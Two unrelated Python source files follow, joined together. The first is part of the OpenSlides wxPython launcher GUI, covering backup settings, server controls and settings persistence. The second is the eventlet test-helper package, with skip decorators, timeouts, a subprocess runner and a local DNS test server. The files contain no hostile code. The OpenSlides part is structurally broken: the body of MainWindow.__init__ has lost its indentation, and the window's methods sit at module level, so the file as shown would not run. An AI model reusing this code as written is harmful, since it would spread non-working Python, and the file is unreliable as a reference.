        self.sb_interval.Bind(wx.EVT_SPINCTRL, self.on_interval_changed)
        grid.Add(self.sb_interval, pos=(row, 1))
        self.ch_interval_unit = wx.Choice(self)
        grid.Add(self.ch_interval_unit, pos=(row, 2))
        row += 1
        grid.AddGrowableCol(1)
        sizer = self.CreateButtonSizer(wx.OK | wx.CANCEL)
        # CreateButtonSizer may return None on some platforms/flags.
        if not sizer is None:
            grid.Add((0, 0), pos=(row, 0), span=(1, 3))
            row += 1
            grid.Add(sizer, pos=(row, 0), span=(1, 3))
        box = wx.BoxSizer(wx.VERTICAL)
        box.Add(
            grid, flag=wx.EXPAND | wx.ALL | wx.ALIGN_CENTER_VERTICAL,
            border=5, proportion=1)
        self.SetSizerAndFit(box)
        self._update_interval_choices()
        self._update_backup_enabled()
    @property
    def backupdb_enabled(self):
        """Whether periodic backups are enabled (checkbox state)."""
        return self.cb_backup.GetValue()
    @backupdb_enabled.setter
    def backupdb_enabled(self, enabled):
        self.cb_backup.SetValue(enabled)
        self._update_backup_enabled()
    @property
    def backupdb_destination(self):
        """Backup target path from the file picker."""
        return self.fp_dest.GetPath()
    @backupdb_destination.setter
    def backupdb_destination(self, path):
        self.fp_dest.SetPath(path)
    @property
    def interval(self):
        """Interval count (>= 1) from the spin control."""
        return self.sb_interval.GetValue()
    @interval.setter
    def interval(self, value):
        self.sb_interval.SetValue(value)
        self._update_interval_choices()
    @property
    def interval_unit(self):
        """Selected unit name: "second", "minute" or "hour"."""
        return self._INTERVAL_UNITS[self.ch_interval_unit.GetSelection()]
    @interval_unit.setter
    def interval_unit(self, unit):
        try:
            idx = self._INTERVAL_UNITS.index(unit)
        except ValueError:
            # BUGFIX: list.index raises ValueError, not IndexError — the
            # original `except IndexError` never matched, so an unknown unit
            # leaked a raw "'x' is not in list" error instead of this message.
            raise ValueError("Unknown unit {0}".format(unit))
        self.ch_interval_unit.SetSelection(idx)
    def _update_interval_choices(self):
        """Rebuild the unit choice list with labels pluralised for the
        current count, preserving the current selection."""
        count = self.sb_interval.GetValue()
        choices = [
            ungettext("second", "seconds", count),
            ungettext("minute", "minutes", count),
            ungettext("hour", "hours", count),
        ]
        current = self.ch_interval_unit.GetSelection()
        if current == wx.NOT_FOUND:
            current = 2  # default to hour
        self.ch_interval_unit.Clear()
        self.ch_interval_unit.AppendItems(choices)
        self.ch_interval_unit.SetSelection(current)
    def _update_backup_enabled(self):
        """Enable/disable the detail controls to follow the checkbox."""
        checked = self.cb_backup.IsChecked()
        self.fp_dest.Enable(checked)
        self.sb_interval.Enable(checked)
        self.ch_interval_unit.Enable(checked)
    def on_backup_checked(self, evt):
        self._update_backup_enabled()
    def on_interval_changed(self, evt):
        self._update_interval_choices()
    # TODO: validate settings on close (e.g. non-empty path if backup is
    # enabled)
class MainWindow(wx.Frame):
def __init__(self, parent=None):
super(MainWindow, self).__init__(parent, title="OpenSlides")
icons = wx.IconBundleFromFile(
get_data_path("openslides.ico"),
wx.BITMAP_TYPE_ICO)
self.SetIcons(icons)
self.server_running = False
self.gui_settings_path = None
self.gui_initialized = False
self.backupdb_enabled = False
self.backupdb_destination = ""
self.backupdb_interval = 15
self.backupdb_interval_unit = "minute"
self.last_backup = None
self.backup_timer = wx.Timer(self)
self.Bind(wx.EVT_TIMER, self.on_backup_timer, self.backup_timer)
spacing = 5
panel = wx.Panel(self)
grid = wx.GridBagSizer(spacing, spacing)
# logo & about button
logo_box = wx.BoxSizer(wx.HORIZONTAL)
grid.Add(logo_box, pos=(0, 0), flag=wx.EXPAND)
row = 0
fp = get_data_path("openslides-logo_wide.png")
with open(fp, "rb") as f:
logo_wide_bmp = wx.ImageFromStream(f).ConvertToBitmap()
logo_wide = wx.StaticBitmap(panel, wx.ID_ANY, logo_wide_bmp)
logo_box.AddSpacer(2 * spacing)
logo_box.Add(logo_wide)
logo_box.AddStretchSpacer()
version_str = _("Version {0}").format(openslides.get_version())
lb_version = wx.StaticText(panel, label=version_str)
font = lb_version.GetFont()
font.SetPointSize(8)
lb_version.SetFont(font)
logo_box.Add(lb_version, flag=wx.ALIGN_CENTER_VERTICAL)
self.bt_about = wx.Button(panel, label=_("&About..."))
self.bt_about.Bind(wx.EVT_BUTTON, self.on_about_clicked)
grid.Add(self.bt_about, pos=(row, 1), flag=wx.ALIGN_CENTER_VERTICAL)
row += 1
grid.Add((0, spacing), pos=(row, 0), span=(1, 2))
row += 1
# server settings
server_settings = wx.StaticBox(panel, wx.ID_ANY, _("Server Settings"))
server_box = wx.StaticBoxSizer(server_settings, wx.VERTICAL)
grid.Add(server_box, pos=(row, 0), flag=wx.EXPAND)
self._host = None
self._port = None
hbox = wx.BoxSizer(wx.HORIZONTAL)
server_box.Add(hbox, flag=wx.EXPAND)
self.lb_host = wx.StaticText(panel)
hbox.Add(self.lb_host, flag=wx.ALIGN_CENTER_VERTICAL)
hbox.AddStretchSpacer()
self.lb_port = wx.StaticText(panel)
hbox.Add(self.lb_port, flag=wx.ALIGN_CENTER_VERTICAL)
hbox.AddStretchSpacer()
self.bt_settings = wx.Button(panel, label=_("S&ettings..."))
self.bt_settings.Bind(wx.EVT_BUTTON, self.on_settings_clicked)
hbox.Add(self.bt_settings)
server_box.AddSpacer(spacing)
self.cb_start_browser = wx.CheckBox(
panel, label=_("Automatically open &browser"))
self.cb_start_browser.SetValue(True)
server_box.Add(self.cb_start_browser)
server_box.AddStretchSpacer()
server_box.AddSpacer(spacing)
self.bt_server = wx.Button(panel, label=_("&Start server"))
self.bt_server.Bind(wx.EVT_BUTTON, self.on_start_server_clicked)
server_box.Add(self.bt_server, flag=wx.EXPAND)
self.host = "0.0.0.0"
self.port = unicode(get_port(self.host, 80))
# "action" buttons
action_vbox = wx.BoxSizer(wx.VERTICAL)
action_vbox.AddSpacer(3 * spacing)
grid.Add(action_vbox, pos=(row, 1))
self.bt_backup = wx.Button(panel, label=_("&Backup database..."))
self.bt_backup.Bind(wx.EVT_BUTTON, self.on_backup_clicked)
action_vbox.Add(self.bt_backup)
action_vbox.AddSpacer(spacing)
self.bt_sync_db = wx.Button(panel, label=_("S&ync database"))
self.bt_sync_db.Bind(wx.EVT_BUTTON, self.on_syncdb_clicked)
action_vbox.Add(self.bt_sync_db)
action_vbox.AddSpacer(spacing)
self.bt_reset_admin = wx.Button(panel, label=_("&Reset admin"))
self.bt_reset_admin.Bind(wx.EVT_BUTTON, self.on_reset_admin_clicked)
action_vbox.Add(self.bt_reset_admin)
row += 1
# command output
self.cmd_run_ctrl = RunCommandControl(panel)
self.cmd_run_ctrl.Bind(EVT_RUN_CMD, self.on_run_cmd_changed)
grid.Add(
self.cmd_run_ctrl,
pos=(row, 0), span=(1, 2),
flag=wx.EXPAND)
grid.AddGrowableCol(0)
grid.AddGrowableRow(3)
box = wx.BoxSizer(wx.VERTICAL)
box.Add(
grid, flag=wx.EXPAND | wx.ALL | wx.ALIGN_CENTER_VERTICAL,
border=spacing, proportion=1)
panel.SetSizerAndFit(box)
self.Fit()
self.SetMinSize(self.ClientToWindowSize(box.GetMinSize()))
self.SetInitialSize(wx.Size(500, 400))
self.Bind(wx.EVT_CLOSE, self.on_close)
def initialize_gui(self):
    """Perform one-time GUI initialization.

    Locates the per-user data directory, loads persisted GUI settings
    and arms the backup timer.  Returns True on success, False when the
    portable directory is not writable (an error dialog is shown then).
    """
    if self.gui_initialized:
        return True
    # Set path for gui settings to default user data according to the
    # OpenSlides type. This does not depend on any argument the user might
    # type in.
    openslides_type = detect_openslides_type()
    try:
        default_user_data_path = get_default_user_data_path(openslides_type)
    except PortableDirNotWritable:
        wx.MessageBox(
            _("The portable directory is not writable. Please copy the "
              "openslides portable to a writeable location and start it "
              "again from there"),
            _("Error: Portable directory not writable"),
            wx.OK | wx.ICON_ERROR)
        return False
    self.gui_settings_path = os.path.join(
        default_user_data_path, 'openslides', 'gui_settings.json')
    # Order matters: settings must be loaded before the backup timer is armed.
    self.load_gui_settings()
    self.apply_backup_settings()
    self.gui_initialized = True
    return True
@property
def backup_interval_seconds(self):
    """Return the configured backup interval converted to seconds.

    Raises ValueError for an unknown interval unit.  (The original
    if/elif chain left `factor` unbound for unknown units, producing a
    confusing NameError instead.)
    """
    factors = {"second": 1, "minute": 60, "hour": 3600}
    try:
        factor = factors[self.backupdb_interval_unit]
    except KeyError:
        raise ValueError(
            "unknown backup interval unit: %r" % self.backupdb_interval_unit)
    return self.backupdb_interval * factor
@property
def host(self):
    """The server host address currently configured in the GUI."""
    return self._host

@host.setter
def host(self, host):
    # Keep the "Host: ..." label in sync with the stored value.
    self._host = host
    self.lb_host.SetLabel(_("Host: {0}").format(host))
@property
def port(self):
    """The server port (stored as a string) currently configured in the GUI."""
    return self._port

@port.setter
def port(self, port):
    # Keep the "Port: ..." label in sync with the stored value.
    self._port = port
    self.lb_port.SetLabel(_("Port: {0}").format(port))
def load_gui_settings(self):
    """Load persisted GUI settings (backup + server options) from
    ``self.gui_settings_path``.

    A missing file is silently ignored; only values actually present in
    the file overwrite the current defaults.
    """
    if self.gui_settings_path is None:
        return
    try:
        f = open(self.gui_settings_path, "rb")
    except IOError as e:
        if e.errno == errno.ENOENT:
            return  # no settings saved yet -- keep defaults
        raise
    with f:
        settings = json.load(f)

    def setattr_unless_none(attr, value):
        # Only overwrite a default when the file supplied a real value.
        # (idiom fix: "value is not None" instead of "not value is None")
        if value is not None:
            setattr(self, attr, value)

    backup_settings = settings.get("database_backup", {})
    setattr_unless_none("backupdb_enabled", backup_settings.get("enabled"))
    setattr_unless_none(
        "backupdb_destination", backup_settings.get("destination"))
    setattr_unless_none(
        "backupdb_interval", backup_settings.get("interval"))
    setattr_unless_none(
        "backupdb_interval_unit", backup_settings.get("interval_unit"))
    last_backup = backup_settings.get("last_backup")
    if last_backup is not None:
        self.last_backup = datetime.datetime.strptime(
            last_backup, "%Y-%m-%d %H:%M:%S")
    server_settings = settings.get("server_settings", {})
    setattr_unless_none("host", server_settings.get("host"))
    setattr_unless_none("port", server_settings.get("port"))
def save_gui_settings(self):
    """Persist GUI settings as JSON to ``self.gui_settings_path``,
    creating the parent directory if needed.
    """
    if self.last_backup is None:
        last_backup = None
    else:
        last_backup = self.last_backup.strftime("%Y-%m-%d %H:%M:%S")
    settings = {
        "database_backup": {
            "enabled": self.backupdb_enabled,
            "destination": self.backupdb_destination,
            # BUG FIX: this key was written as "internal" but read back as
            # "interval" in load_gui_settings(), so a saved interval was
            # silently dropped on the next start.
            "interval": self.backupdb_interval,
            "interval_unit": self.backupdb_interval_unit,
            "last_backup": last_backup
        },
        "server_settings": {
            "host": self.host,
            "port": self.port,
        },
    }
    dp = os.path.dirname(self.gui_settings_path)
    if not os.path.exists(dp):
        os.makedirs(dp)
    # Text mode: json.dump() emits text, not bytes.
    with open(self.gui_settings_path, "w") as f:
        json.dump(settings, f, ensure_ascii=False, indent=4)
def apply_backup_settings(self):
    """(Re)arm or stop the one-shot backup timer.

    The timer only runs while the server is running and backups are
    enabled; the delay is derived from the time of the last backup.
    """
    if self.backupdb_enabled and self.server_running:
        now = datetime.datetime.utcnow()
        delta = datetime.timedelta(seconds=self.backup_interval_seconds)
        ref = self.last_backup
        if ref is None:
            # Never backed up before: schedule one full interval from now.
            ref = now
        ref += delta
        d = ref - now
        seconds = d.days * 86400 + d.seconds
        if seconds < 1:
            seconds = 30  # avoid backup immediately after start
        # wx one-shot timer takes milliseconds.
        self.backup_timer.Start(seconds * 1000, True)
    else:
        self.backup_timer.Stop()
def do_backup(self):
    """Run ``python -m openslides backupdb <destination>`` synchronously
    and append its output plus a timestamped success/failure line to the
    command output widget.
    """
    cmd = [
        sys.executable, "-u", "-m", "openslides", "backupdb",
        self.backupdb_destination,
    ]
    p = subprocess.Popen(
        cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE,
        stderr=subprocess.STDOUT)
    p.stdin.close()
    output = p.stdout.read().strip()
    exitcode = p.wait()
    if output:
        self.cmd_run_ctrl.append_message(output)
    # Renamed from "time" to avoid shadowing the time module.
    timestamp = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
    if exitcode == 0:
        self.cmd_run_ctrl.append_message(
            _("{0}: Database backup successful.").format(timestamp))
    else:
        self.cmd_run_ctrl.append_message(
            _("{0}: Database backup failed!").format(timestamp))
    self.last_backup = datetime.datetime.utcnow()
def on_syncdb_clicked(self, evt):
    """Handler for the "Sync database" button."""
    ctrl = self.cmd_run_ctrl
    ctrl.append_message(_("Syncing database..."))
    ctrl.run_command("syncdb")
def on_reset_admin_clicked(self, evt):
    """Handler for the "Reset admin" button."""
    ctrl = self.cmd_run_ctrl
    ctrl.append_message(_("Resetting admin user..."))
    ctrl.run_command("createsuperuser")
def on_about_clicked(self, evt):
    """Show the standard wx "About" dialog with version and license info."""
    info = wx.AboutDialogInfo()
    info.SetName("OpenSlides")
    info.SetVersion(openslides.get_version())
    # Non-breaking spaces keep the description text from wrapping.
    info.SetDescription(_(
        "OpenSlides is a free web based presentation and "
        "assembly system.\n"
        "OpenSlides is free software; licensed under the MIT license."
    ).replace(u" ", u"\u00a0"))
    info.SetCopyright(_(u"\u00a9 2011-2014 by OpenSlides team"))
    info.SetWebSite(("http://www.openslides.org/", "www.openslides.org"))
    # XXX: at least on wxgtk this has no effect
    info.SetIcon(self.GetIcon())
    wx.AboutBox(info)
def on_start_server_clicked(self, evt):
    """Toggle the server: stop it when running, otherwise start it."""
    if self.server_running:
        self.cmd_run_ctrl.cancel_command()
        return
    # 0.0.0.0 is the default; only pass --address for a specific host.
    cli_args = []
    if self._host != "0.0.0.0":
        cli_args.extend(["--address", self._host])
    cli_args.extend(["--port", self._port])
    if not self.cb_start_browser.GetValue():
        cli_args.append("--no-browser")
    self.server_running = True
    self.cmd_run_ctrl.run_command("start", *cli_args)
    # initiate backup_timer if backup is enabled
    self.apply_backup_settings()
    self.bt_server.SetLabel(_("&Stop server"))
def on_settings_clicked(self, evt):
    """Show the settings dialog and apply host/port when confirmed."""
    dlg = SettingsDialog(self)
    dlg.host = self._host
    dlg.port = self._port
    if dlg.ShowModal() != wx.ID_OK:
        return
    self.host = dlg.host
    self.port = dlg.port
def on_backup_clicked(self, evt):
    """Show the backup settings dialog and apply its result."""
    dlg = BackupSettingsDialog(self)
    dlg.backupdb_enabled = self.backupdb_enabled
    dlg.backupdb_destination = self.backupdb_destination
    dlg.interval = self.backupdb_interval
    dlg.interval_unit = self.backupdb_interval_unit
    if dlg.ShowModal() != wx.ID_OK:
        return
    self.backupdb_enabled = dlg.backupdb_enabled
    self.backupdb_destination = dlg.backupdb_destination
    self.backupdb_interval = dlg.interval
    self.backupdb_interval_unit = dlg.interval_unit
    # Re-arm (or stop) the backup timer with the new values.
    self.apply_backup_settings()
def on_run_cmd_changed(self, evt):
    """React to the background command starting/stopping.

    Updates button enabled states, performs a final backup when the
    server stops, and prints a completion message for other commands.
    """
    show_completion_msg = not evt.running
    if self.server_running and not evt.running:
        # The server process just terminated.
        self.bt_server.SetLabel(_("&Start server"))
        self.server_running = False
        self.backup_timer.Stop()
        if self.backupdb_enabled:
            self.do_backup()
        # no operation completed msg when stopping server
        show_completion_msg = False
    # Action buttons are disabled while any command runs; the server
    # button stays usable while the server runs so it can stop it.
    self.bt_settings.Enable(not evt.running)
    self.bt_backup.Enable(not evt.running)
    self.bt_sync_db.Enable(not evt.running)
    self.bt_reset_admin.Enable(not evt.running)
    self.bt_server.Enable(self.server_running or not evt.running)
    if show_completion_msg:
        if evt.exitcode == 0:
            text = _("Operation successfully completed.")
        else:
            text = _("Operation failed (exit code = {0})").format(
                evt.exitcode)
        self.cmd_run_ctrl.append_message(text)
def on_backup_timer(self, evt):
    """Timer callback: run a backup, then re-arm the one-shot timer."""
    if not self.backupdb_enabled:
        return
    self.do_backup()
    self.backup_timer.Start(self.backup_interval_seconds * 1000, True)
def on_close(self, ev):
    """Window close handler: stop any running command, persist the GUI
    settings, then destroy the window."""
    self.cmd_run_ctrl.cancel_command()
    self.save_gui_settings()
    self.Destroy()
class OpenslidesApp(wx.App):
    """wx application object that creates and shows the main window."""

    def __init__(self):
        # redirect=False keeps stdout/stderr on the console.
        super(OpenslidesApp, self).__init__(False)

    def OnInit(self):
        window = MainWindow()
        self.SetTopWindow(window)
        if not window.initialize_gui():
            # e.g. portable directory not writable -- abort startup.
            self.Exit()
            return False
        window.Show()
        return True
def main():
    """Entry point: configure locale/translations and run the wx loop."""
    locale.setlocale(locale.LC_ALL, "")
    lang = locale.getdefaultlocale()[0]
    if lang:
        global _translations
        # Reuse the "django" message catalog shipped inside openslides.
        localedir = filesystem2unicode(openslides.__file__)
        localedir = os.path.dirname(localedir)
        localedir = os.path.join(localedir, "locale")
        _translations = gettext.translation(
            "django", localedir, [lang], fallback=True)
    app = OpenslidesApp()
    app.MainLoop()
# Allow running this module directly as a script.
if __name__ == "__main__":
    main()
|
__init__.py | # package is named tests, not test, so it won't be confused with test in stdlib
from __future__ import print_function
import contextlib
import errno
import functools
import gc
import json
import os
try:
import resource
except ImportError:
resource = None
import signal
try:
import subprocess32 as subprocess # py2
except ImportError:
import subprocess # py3
import sys
import unittest
import warnings
from nose.plugins.skip import SkipTest
import eventlet
from eventlet import tpool
import six
import socket
from threading import Thread
import struct
# convenience for importers
main = unittest.main
@contextlib.contextmanager
def assert_raises(exc_type):
    """Context manager asserting that the body raises *exc_type*."""
    try:
        yield
    except exc_type:
        # Expected exception occurred -- success.
        pass
    else:
        shown = getattr(exc_type, '__name__', str(exc_type))
        assert False, 'Expected exception {0}'.format(shown)
def skipped(func, *decorator_args):
    """Decorator that marks a function as skipped.
    """
    @functools.wraps(func)
    def replacement(*args, **kwargs):
        raise SkipTest(*decorator_args)
    return replacement
def skip_if(condition):
    """Decorator factory: skip the decorated test when *condition* holds.

    *condition* may be a bool, or a callable taking the decorated
    function and returning True to skip it.
    """
    def decorate(func):
        @functools.wraps(func)
        def inner(*args, **kwargs):
            should_skip = condition if isinstance(condition, bool) else condition(func)
            if should_skip:
                raise SkipTest()
            return func(*args, **kwargs)
        return inner
    return decorate
def skip_unless(condition):
    """Decorator factory: skip the decorated test unless *condition* holds.

    *condition* may be a bool, or a callable taking the decorated
    function and returning True when the test should run.
    """
    def decorate(func):
        @functools.wraps(func)
        def inner(*args, **kwargs):
            satisfied = condition if isinstance(condition, bool) else condition(func)
            if not satisfied:
                raise SkipTest()
            return func(*args, **kwargs)
        return inner
    return decorate
def using_pyevent(_f):
    """Return True when the active eventlet hub is the pyevent one.

    The *_f* argument is ignored; it exists so this function can be
    passed directly as a skip_if() condition callable.
    """
    from eventlet.hubs import get_hub
    return 'pyevent' in type(get_hub()).__module__
def skip_with_pyevent(func):
    """ Decorator that skips a test if we're using the pyevent hub."""
    return skip_if(using_pyevent)(func)
def skip_on_windows(func):
    """ Decorator that skips a test on Windows."""
    # sys.platform is 'win32' on Windows regardless of bitness.
    return skip_if(sys.platform.startswith('win'))(func)
def skip_if_no_itimer(func):
    """ Decorator that skips a test if the `itimer` module isn't found """
    try:
        import itimer  # noqa: F401
        available = True
    except ImportError:
        available = False
    return skip_unless(available)(func)
def skip_if_CRLock_exist(func):
    """ Decorator that skips a test if the `_thread.RLock` class exists """
    try:
        from _thread import RLock  # noqa: F401
    except ImportError:
        # No C-level RLock -- run the test normally.
        return func
    return skipped(func)
def skip_if_no_ssl(func):
    """ Decorator that skips a test if SSL is not available."""
    # Either green ssl or green pyOpenSSL is good enough.
    for module_name in ('eventlet.green.ssl', 'eventlet.green.OpenSSL'):
        try:
            __import__(module_name)
            return func
        except ImportError:
            continue
    return skipped(func)
def skip_if_no_ipv6(func):
    """Skip unless the environment opts into IPv6 tests."""
    if os.environ.get('eventlet_test_ipv6') == '1':
        return func
    return skipped(func)
class TestIsTakingTooLong(Exception):
    """ Custom exception class to be raised when a test's runtime exceeds a limit.

    The constructor argument is the timeout value that was exceeded.
    """
    pass
class LimitedTestCase(unittest.TestCase):
    """ Unittest subclass that adds a timeout to all tests. Subclasses must
    be sure to call the LimitedTestCase setUp and tearDown methods. The default
    timeout is 1 second, change it by setting TEST_TIMEOUT to the desired
    quantity."""

    TEST_TIMEOUT = 1  # seconds; per-test wall-clock budget

    def setUp(self):
        self.previous_alarm = None
        # Arm an eventlet timeout that raises inside the test greenlet.
        self.timer = eventlet.Timeout(self.TEST_TIMEOUT,
                                      TestIsTakingTooLong(self.TEST_TIMEOUT))

    def reset_timeout(self, new_timeout):
        """Changes the timeout duration; only has effect during one test.
        `new_timeout` can be int or float.
        """
        self.timer.cancel()
        self.timer = eventlet.Timeout(new_timeout,
                                      TestIsTakingTooLong(new_timeout))

    def set_alarm(self, new_timeout):
        """Call this in the beginning of your test if you expect busy loops.
        Only has effect during one test.
        `new_timeout` must be int.
        """
        def sig_alarm_handler(sig, frame):
            # Could arm previous alarm but test is failed anyway
            # seems to be no point in restoring previous state.
            raise TestIsTakingTooLong(new_timeout)

        # SIGALRM fires even when a busy loop never yields to the hub.
        self.previous_alarm = (
            signal.signal(signal.SIGALRM, sig_alarm_handler),
            signal.alarm(new_timeout),
        )

    def tearDown(self):
        self.timer.cancel()
        if self.previous_alarm:
            # Restore whatever handler/alarm set_alarm() replaced.
            signal.signal(signal.SIGALRM, self.previous_alarm[0])
            signal.alarm(self.previous_alarm[1])
        tpool.killall()
        gc.collect()
        eventlet.sleep(0)  # let pending hub callbacks drain first
        verify_hub_empty()

    def assert_less_than(self, a, b, msg=None):
        msg = msg or "%s not less than %s" % (a, b)
        assert a < b, msg

    assertLessThan = assert_less_than

    def assert_less_than_equal(self, a, b, msg=None):
        msg = msg or "%s not less than or equal to %s" % (a, b)
        assert a <= b, msg

    assertLessThanEqual = assert_less_than_equal
def check_idle_cpu_usage(duration, allowed_part):
    """Sleep for *duration* seconds and assert the process consumed at
    most ``duration * allowed_part`` seconds of CPU time while idle."""
    if resource is None:
        # TODO: use https://code.google.com/p/psutil/
        from nose.plugins.skip import SkipTest
        raise SkipTest('CPU usage testing not supported (`import resource` failed)')
    r1 = resource.getrusage(resource.RUSAGE_SELF)
    eventlet.sleep(duration)
    r2 = resource.getrusage(resource.RUSAGE_SELF)
    utime = r2.ru_utime - r1.ru_utime
    stime = r2.ru_stime - r1.ru_stime
    # This check is reliably unreliable on Travis/Github Actions, presumably because of CPU
    # resources being quite restricted by the build environment. The workaround
    # is to apply an arbitrary factor that should be enough to make it work nicely.
    if os.environ.get('CI') == 'true':
        allowed_part *= 5
    assert utime + stime < duration * allowed_part, \
        "CPU usage over limit: user %.0f%% sys %.0f%% allowed %.0f%%" % (
            utime / duration * 100, stime / duration * 100,
            allowed_part * 100)
def verify_hub_empty():
    """Assert the eventlet hub has no leftover readers or writers.

    Called from LimitedTestCase.tearDown to catch leaked listeners.
    """
    def format_listener(listener):
        return 'Listener %r for greenlet %r with run callback %r' % (
            listener, listener.greenlet, getattr(listener.greenlet, 'run', None))

    from eventlet import hubs
    hub = hubs.get_hub()
    readers = hub.get_readers()
    writers = hub.get_writers()
    num_readers = len(readers)
    num_writers = len(writers)
    # NOTE(review): timer count is fetched but never asserted on.
    num_timers = hub.get_timers_count()
    assert num_readers == 0 and num_writers == 0, \
        "Readers: %s (%d) Writers: %s (%d)" % (
            ', '.join(map(format_listener, readers)), num_readers,
            ', '.join(map(format_listener, writers)), num_writers,
        )
def find_command(command):
    """Return the absolute path of *command* by searching ``$PATH``.

    Raises IOError(ENOENT) when no matching executable is found.
    """
    # Renamed loop variable: "dir" shadowed the builtin.
    for directory in os.getenv('PATH', '/usr/bin:/usr/sbin').split(os.pathsep):
        candidate = os.path.join(directory, command)
        # isfile() guards against matching a *directory* that happens to
        # carry the execute bit (os.access alone would accept it).
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return candidate
    raise IOError(errno.ENOENT, 'Command not found: %r' % command)
def silence_warnings(func):
    """Decorator that runs *func* with DeprecationWarning suppressed,
    restoring the default filter afterwards.
    """
    # functools.wraps preserves __doc__/__module__ etc., consistent with
    # the other decorators in this module (skipped, skip_if, skip_unless),
    # instead of hand-copying only __name__.
    @functools.wraps(func)
    def wrapper(*args, **kw):
        warnings.simplefilter('ignore', DeprecationWarning)
        try:
            return func(*args, **kw)
        finally:
            warnings.simplefilter('default', DeprecationWarning)
    return wrapper
def get_database_auth():
    """Retrieves a dict of connection parameters for connecting to test databases.
    Authentication parameters are highly-machine specific, so
    get_database_auth gets its information from either environment
    variables or a config file. The environment variable is
    "EVENTLET_DB_TEST_AUTH" and it should contain a json object. If
    this environment variable is present, it's used and config files
    are ignored. If it's not present, it looks in the local directory
    (tests) and in the user's home directory for a file named
    ".test_dbauth", which contains a json map of parameters to the
    connect function.
    """
    defaults = {
        'MySQLdb': {'host': 'localhost', 'user': 'root', 'passwd': ''},
        'psycopg2': {'user': 'test'},
    }
    if 'EVENTLET_DB_TEST_AUTH' in os.environ:
        return json.loads(os.environ.get('EVENTLET_DB_TEST_AUTH'))
    candidates = [
        os.path.join(os.path.dirname(__file__), '.test_dbauth'),
        os.path.join(os.path.expanduser('~'), '.test_dbauth'),
    ]
    for path in candidates:
        try:
            parsed = json.load(open(path))
        except IOError:
            continue
        # Have to convert unicode objects to str objects because
        # mysqldb is dumb. Using a doubly-nested comprehension
        # because we know that the structure is a two-level dict.
        return dict(
            (str(modname), dict(
                (str(k), str(v)) for k, v in connectargs.items()))
            for modname, connectargs in parsed.items())
    return defaults
def run_python(path, env=None, args=None, timeout=None, pythonpath_extend=None, expect_pass=False):
    """Run *path* in a fresh interpreter subprocess and return its
    combined stdout/stderr as bytes.

    path             -- script to run; falsy means bare interpreter (use args)
    env              -- extra environment variables to merge in
    args             -- extra argv entries appended last
    timeout          -- seconds before the child is killed (default 10)
    pythonpath_extend-- extra PYTHONPATH entries; relative ones are
                        resolved against the source tree
    expect_pass      -- assert the child printed exactly "pass"; output
                        starting with "skip[:reason]" raises SkipTest
    """
    new_argv = [sys.executable]
    if sys.version_info[:2] <= (2, 7):
        new_argv += ['-W', 'ignore:Python 2 is no longer supported']
    new_env = os.environ.copy()
    new_env.setdefault('eventlet_test_in_progress', 'yes')
    src_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
    if path:
        path = os.path.abspath(path)
        new_argv.append(path)
        # Make the source tree importable from the child process.
        new_env['PYTHONPATH'] = os.pathsep.join(sys.path + [src_dir])
    if env:
        new_env.update(env)
    if pythonpath_extend:
        new_path = [p for p in new_env.get('PYTHONPATH', '').split(os.pathsep) if p]
        new_path.extend(
            p if os.path.isabs(p) else os.path.join(src_dir, p) for p in pythonpath_extend
        )
        new_env['PYTHONPATH'] = os.pathsep.join(new_path)
    if args:
        new_argv.extend(args)
    p = subprocess.Popen(
        new_argv,
        env=new_env,
        stderr=subprocess.STDOUT,
        stdin=subprocess.PIPE,
        stdout=subprocess.PIPE,
    )
    if timeout is None:
        timeout = 10
    try:
        output, _ = p.communicate(timeout=timeout)
    except subprocess.TimeoutExpired:
        p.kill()
        # Second communicate() collects whatever the killed child wrote.
        output, _ = p.communicate(timeout=timeout)
        if expect_pass:
            sys.stderr.write('Program {0} output:\n---\n{1}\n---\n'.format(path, output.decode()))
            assert False, 'timed out'
        return '{0}\nFAIL - timed out'.format(output).encode()
    if expect_pass:
        if output.startswith(b'skip'):
            parts = output.rstrip().split(b':', 1)
            skip_args = []
            if len(parts) > 1:
                skip_args.append(parts[1])
            raise SkipTest(*skip_args)
        ok = output.rstrip() == b'pass'
        if not ok:
            sys.stderr.write('Program {0} output:\n---\n{1}\n---\n'.format(path, output.decode()))
        assert ok, 'Expected single line "pass" in stdout'
    return output
def run_isolated(path, prefix='tests/isolated/', **kwargs):
    """Run an isolated-test script (relative to *prefix*) and require it
    to print "pass" unless the caller overrides expect_pass."""
    kwargs.setdefault('expect_pass', True)
    run_python(prefix + path, **kwargs)
def check_is_timeout(obj):
    """Assert that *obj* advertises itself as a timeout via .is_timeout."""
    shown = getattr(obj, 'is_timeout', '(missing)')
    assert obj.is_timeout, 'type={0} str={1} .is_timeout={2}'.format(type(obj), str(obj), shown)
@contextlib.contextmanager
def capture_stderr():
    """Temporarily replace sys.stderr with a StringIO and yield it.

    The stream is rewound to position 0 on exit so callers can read()
    the captured text directly.
    """
    stream = six.StringIO()
    original = sys.stderr
    try:
        sys.stderr = stream
        yield stream
    finally:
        sys.stderr = original
        stream.seek(0)
# Paths to the SSL fixture files shipped next to this package.
certificate_file = os.path.join(os.path.dirname(__file__), 'test_server.crt')
private_key_file = os.path.join(os.path.dirname(__file__), 'test_server.key')
def test_run_python_timeout():
    # A child sleeping longer than the timeout must be killed and its
    # output suffixed with the timeout marker.
    output = run_python('', args=('-c', 'import time; time.sleep(0.5)'), timeout=0.1)
    assert output.endswith(b'FAIL - timed out')
def test_run_python_pythonpath_extend():
    # Relative pythonpath_extend entries must show up (absolutized) in
    # the child interpreter's sys.path.
    code = '''import os, sys ; print('\\n'.join(sys.path))'''
    output = run_python('', args=('-c', code), pythonpath_extend=('dira', 'dirb'))
    assert b'/dira\n' in output
    assert b'/dirb\n' in output
@contextlib.contextmanager
def dns_tcp_server(ip_to_give, request_count=1):
    """Context manager running a throwaway DNS-over-TCP server on localhost.

    Yields the (host, port) address the server listens on.  For up to
    *request_count* requests it answers standard queries with
    *ip_to_give* as an A record, or with a refused-style reply when
    *ip_to_give* is falsy.  On exit it connects once with a magic
    "death pill" payload to unblock accept() and joins the thread.
    """
    state = [0]  # request count storage writable by thread
    host = "localhost"
    death_pill = b"DEATH_PILL"

    def extract_domain(data):
        # Walk the length-prefixed labels of the question section.
        domain = b''
        kind = (data[4] >> 3) & 15  # Opcode bits
        if kind == 0:  # Standard query
            # Offset 14 = 2-byte TCP length prefix + 12-byte DNS header.
            ini = 14
